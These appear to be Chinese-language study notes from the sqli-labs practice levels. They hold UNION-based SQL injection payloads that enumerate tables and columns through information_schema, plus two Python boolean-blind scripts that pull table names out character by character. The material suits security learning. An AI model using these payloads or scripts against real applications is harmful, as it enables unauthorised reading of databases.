-
sql注入的前要
-
没有对用户的输入进行过滤,和对sql语句的预编译
-
select group_concat(table_name) from information_schema.tables where table_schema=database()
?id=-1") union select 1,group_concat(table_name),2 from information_schema.tables where table_schema=database() %23
?id=-1") UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23
?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),0,1) )=','%23
import requests
import time
for i in range(0,100):
if(i%10==0):
time.sleep(1)
url = "https://sql.alienwares.top/Less-5/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )=','%23"
res = requests.get(url)
if (len(res.content) == 704):
print(",",end="")
continue
for e in range(ord("a"), ord("z") + 1):
url="https://sql.alienwares.top/Less-5/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(i)+",1) )='"+chr(e)+"'%23"
res=requests.get(url)
if (len(res.content) == 704):
print(chr(e), end="")
break
?id=1" and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) )='e' %23
py 脚本同上
@
import requests
import time
#706 正确的长度
for i in range(0,100):
url = "https://sql.alienwares.top/Less-8/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )=','%23"
res = requests.get(url)
time.sleep(1)
if (len(res.content) == 706):
print(",",end="")
continue
for e in range(ord("a"), ord("z") + 1):
url="https://sql.alienwares.top/Less-8/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(i)+",1) )='"+chr(e)+"'%23"
res=requests.get(url)
time.sleep(1)
if (len(res.content) == 706):
print(chr(e), end="")
break